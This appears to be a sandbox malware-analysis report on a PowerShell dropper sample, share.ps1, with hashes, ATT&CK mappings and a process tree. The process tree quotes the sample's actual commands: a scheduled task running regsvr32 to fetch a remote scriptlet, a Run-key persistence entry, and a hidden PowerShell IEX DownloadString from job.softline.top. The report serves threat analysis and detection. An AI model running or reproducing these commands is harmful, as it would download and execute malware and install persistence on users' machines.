e3bd83b61c2deec0f5d6febbfc891be6fc52d2b546bafdf9b182032d845805a8

Analysis

max time kernel
118s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
17-02-2025 20:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

malware-samples-master/2018-04-Common-Malware-Carrier/share.ps1
Size

1KB
MD5

2c9f13f79f1dd88b9b5b1ab3a6e2374b
SHA1

fc7f2e1ad64070be4d44b583155b2ec2af18cb03
SHA256

acec4a38d7b5ef95a2e33dce721c5693e7da966b751ec45bfa3e39b5181c6b19
SHA512

f01fa0a0549a9a26a41dc9ab4f22052d92a699bb7bbd505710034878335ff3e42c624635691e7089fd12d38eaae0613413350f08905a56078b86852842e564f6

Score

10^/10

execution persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://job.softline.top/loadinglit.gif

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2064	powershell.exe
1560	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\windows tasks check = "c:\\windows\\tasks\\SCHEDLGU.exe"	reg.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	\??\c:\windows\tasks\SCHEDLGU.exe	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2544	schtasks.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1560	powershell.exe
2064	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1560	powershell.exe
Token: SeDebugPrivilege	2064	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1560 wrote to memory of 2544	1560	powershell.exe	30
PID 1560 wrote to memory of 2544	1560	powershell.exe	30
PID 1560 wrote to memory of 2544	1560	powershell.exe	30
PID 1560 wrote to memory of 2536	1560	powershell.exe	32
PID 1560 wrote to memory of 2536	1560	powershell.exe	32
PID 1560 wrote to memory of 2536	1560	powershell.exe	32
PID 1560 wrote to memory of 2064	1560	powershell.exe	33
PID 1560 wrote to memory of 2064	1560	powershell.exe	33
PID 1560 wrote to memory of 2064	1560	powershell.exe	33

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\malware-samples-master\2018-04-Common-Malware-Carrier\share.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1560
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /tn "windows update" /tr "regsvr32 /u /s /i:http://job.softline.top/ad2.jpg scrobj.dll" /sc daily /st 12:00 /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2544
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "windows tasks check" /t REG_SZ /d "c:\windows\tasks\SCHEDLGU.exe" /f
  2⤵
  - Adds Run key to start application
  PID:2536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -Windowstyle hidden -noninteractive -nologo IEX (New-Object Net.WebClient).DownloadString('http://job.softline.top/loadinglit.gif')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2064

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
6247994f9423bac9f4046eaa82a1d695

SHA1
8e926ff5f03af97aba2306bd2be2a9f7f513d730

SHA256
e7e91ca6ea3782fd847dea36580bab2beea5959969f4abdfa14679530623c9bf

SHA512
21bd789f58ed4dce20ac5350f801948984f9236e581cde441e33abd92c3734964b3442b3e8336254416c086c67a8db9521ca9bd2301b39da40c8cfa0ed82f419

Download Submit
memory/1560-4-0x000000001B510000-0x000000001B7F2000-memory.dmp

Filesize
2.9MB

Download
memory/1560-5-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/1560-6-0x000007FEF5AEE000-0x000007FEF5AEF000-memory.dmp

Filesize
4KB

Download
memory/1560-8-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

Filesize
9.6MB

Download
memory/1560-7-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

Filesize
9.6MB

Download
memory/1560-9-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

Filesize
9.6MB

Download
memory/1560-10-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

Filesize
9.6MB

Download
memory/1560-11-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

Filesize
9.6MB

Download
memory/1560-12-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

Filesize
9.6MB

Download
memory/2064-18-0x0000000001E50000-0x0000000001E58000-memory.dmp

Filesize
32KB

Download